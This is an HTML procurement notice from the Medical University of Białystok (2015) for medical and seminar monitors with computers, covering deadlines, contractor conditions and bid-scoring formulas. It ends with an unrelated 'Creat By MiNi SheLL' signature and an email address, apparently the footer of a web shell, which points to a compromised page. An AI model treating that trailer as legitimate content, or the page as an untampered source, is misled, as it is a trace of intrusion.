<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umb.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych, pok. 231 (lewe skrzydło Pałacu Branickich, I piętro) Uniwersytet Medyczny w Białymstoku, ul. J. Kilińskiego 1, 15-089 Białystok..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2015 godzina 11:00, miejsce: Kancelaria Ogólna UMB, ul. Jana Kilińskiego 1, 15-089 Białystok, (lewe skrzydło Pałacu Branickich, parter)...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Termin wykonania zamówienia: Dostarczenie, uruchomienie i odbiór urządzeń, zakończenie szkoleń personelu Użytkownika, dotyczących wszystkich urządzeń: w terminie zaoferowanym przez Wykonawcę, nie dłuższym, niż do 4 tygodni od daty zawarcia umowy. 2. Zamówienie stanowi część Inwestycji pn. Przebudowa i rozbudowa Uniwersyteckiego Szpitala Klinicznego Uniwersytetu Medycznego w Białymstoku. 3. Zamawiający informuje, że Inwestycja, której częścią jest przedmiotowe zamówienie, w całości jest finansowana z budżetu państwa oraz ma kilkuletni termin realizacji. Istnieje konieczność uzyskiwania przez Zamawiającego potwierdzenia finansowania w poszczególnych latach; w związku z powyższym Wykonawca dostosuje wykonywanie zamówienia do potwierdzonego przez Zamawiającego finansowania, w tym również w przypadku wydłużenia okresu Inwestycji przez dysponenta środków finansowych. 4. Zamówienie będzie wykonywane zasadniczo na terenie nowobudowanego obiektu Użytkownika, przy czym Wykonawcę obowiązuje niezakłócanie funkcjonowania Użytkownika, w szczególności w zakresie szeroko pojętej komunikacji i ciągłości udzielania świadczeń zdrowotnych. 5. Wykonawca musi wziąć pod uwagę, że na terenie wykonywania zamówienia będą prowadzone różnego rodzaju prace, w tym roboty budowlane, inne dostawy oraz alokacje klinik, realizowane również przez podmioty trzecie, co pociągnie za sobą konieczność koordynacji prac na styku wykonawców. 6. Wykonawcy mogą wspólnie ubiegać się o zamówienie (art. 23 ustawy). Wówczas są zobowiązani ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Warunek wskazany w ww. części B. I musi być spełniony przez każdego z tych wykonawców, natomiast warunek wskazany w części B. III i części B. IV wykonawcy ci mogą spełnić wspólnie. Zgodnie z art. 141 ustawy, wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy zawartej w wyniku niniejszego postępowania niezależnie od treści umowy wiążącej ich wzajemnie. 7. Jeżeli Wykonawca będzie polegał na wiedzy i doświadczeniu lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków - jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Pisemne zobowiązanie musi być opatrzone własnoręcznym podpisem udostępniającego (w oryginale, nie kserokopia), do ewentualnego wykorzystania - wzór: załącznik nr 10 do siwz. Jeżeli wykonawca polega na zasobach podmiotu trzeciego w zakresie wiedzy i doświadczenia, wówczas w realizacji zamówienia konieczny jest udział tego podmiotu trzeciego, jako podwykonawcy, doradcy, konsultanta itp., co powinno wynikać z treści dokumentu wymienionego w niniejszym punkcie. 8. Jeżeli wykonawca polega na zdolnościach finansowych innych podmiotów na zasadach określonych w pkt. 26 ust. 2b ustawy - przedkłada informację, o której mowa w pkt. 5 c), dotyczącą podmiotów udostępniających zasoby finansowe, a także dokumenty wymienione w ww. pkt. 4 b), dotyczące podmiotów udostępniających zasoby finansowe. 9. WYMAGANIA OGÓLNE DOTYCZĄCE PRZEDMIOTU ZAMÓWIENIA.1.	Zamawiający wymaga, aby zaoferowane urządzenia w składzie i konfiguracjach opisanych 
w załączniku nr 1 i nr 2  do siwz były fabrycznie nowe i wyprodukowane w roku 2014 / 2015.
2.	Zaoferowane urządzenia oraz oprogramowanie, które są wyrobami  medycznymi podlegającymi właściwej ocenie zgodności, spełniającymi właściwe wymagania zasadnicze, muszą być dopuszczone do obrotu 
i stosowania zgodnie z obowiązującym prawem i oznakowane CE. 
3.	Zgodnie z art. 14 ust. 1 Ustawy z dnia 20.05.2010 r. o wyrobach medycznych, instrukcje obsługi urządzeń, dostarczone użytkownikowi wraz z urządzeniem muszą być w języku polskim. Nie dopuszcza się instrukcji obsługi w innych językach. Również wszystkie inne dokumenty dostarczone z chwilą uruchomienia urządzeń muszą być w języku polskim. 
4.	Wszelkie oprogramowanie komputerowe wchodzące w skład przedmiotu zamówienia musi być 
w języku polskim.. Licencje na oprogramowanie przekazane Zamawiającemu muszą być nieograniczone czasowo i terytorialnie, upoważniające do korzystania z oprogramowania w zakresie niezbędnym do wykorzystywania wszystkich funkcji urządzeń, wskazanych w siwz i załącznikach do niej. Aktualizacja oprogramowania, również pochodzącego od podmiotów trzecich, będzie dostarczana i instalowana na koszt Wykonawcy w okresie gwarancji na urządzenie niezwłocznie po jej wprowadzeniu do obrotu, bez konieczności zwracania się o aktualizację przez Użytkownika.
5.	Po uruchomieniu urządzeń muszą one być gotowe do użytku zgodnie z ich przeznaczeniem 
bez dodatkowych zakupów inwestycyjnych. Zakupy materiałów eksploatacyjnych i zużywalnych, w tym wyrobów medycznych jednorazowego użytku, nie są zakupami inwestycyjnymi.10.KRYTERIA WYBORU OFERT I SPOSÓB DOKONYWANIA OCENY OFERT. 1. Przy wyborze oferty najkorzystniejszej Zamawiający będzie kierował się następującymi kryteriami: cena - 94% termin dostawy - 6%. 2. Ocenie zostaną poddane oferty niepodlegające odrzuceniu. 3. Ilość punktów PC, jaką otrzyma rozpatrywana i oceniana oferta w kryterium cena, zostanie wyznaczona według wzoru: PC = (CN / CR ) x 94 gdzie : CN - najniższa cena spośród ofert niepodlegających odrzuceniu, CR - cena oferty rozpatrywanej, 94 - maksymalna ilość punktów, jaką może uzyskać oferta wg. kryterium cena 94%. 4. Ilość punktów PT, jaką otrzyma rozpatrywana i oceniana oferta w kryterium termin dostawy zostanie przyznana w następujący sposób: Zaoferowany termin dostawy: 4 tygodnie od daty zawarcia Umowy (maksymalny dopuszczony) - 0 pkt. Zaoferowany termin dostawy: 3 tygodnie od daty zawarcia Umowy - 2 pkt. Zaoferowany termin dostawy: 2 tygodnie od daty zawarcia Umowy i krótszy - 4 pkt. Zaoferowany termin dostawy: 1 tydzień od daty zawarcia Umowy - 6 pkt. 5. Jako oferta najkorzystniejsza wybrana zostanie oferta, która uzyska największą ilość punktów P obliczoną według wzoru: P = PC + PT. 11. Najpóźniej w dniu podpisania umowy wymagane jest wniesienie zabezpieczenia należytego wykonania umowy, w wysokości 10% ceny oferty..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> MONITORY MEDYCZNE..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> MONITOR MEDYCZNY 42 - 46 cali Z KOMPUTEREM - 14 SZT..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.13.00-0, 33.19.70.00-7, 51.61.10.00-8, 51.40.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 94</li>
<li>2. termin dostawy - 6</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MONITORY SEMINARYJNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> MONITOR SEMINARYJNY  65 cali  Z KOMPUTEREM - 25 SZT..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.13.00-0, 33.19.70.00-7, 51.61.10.00-8, 51.40.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 94</li>
<li>2. termin dostawy - 6</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com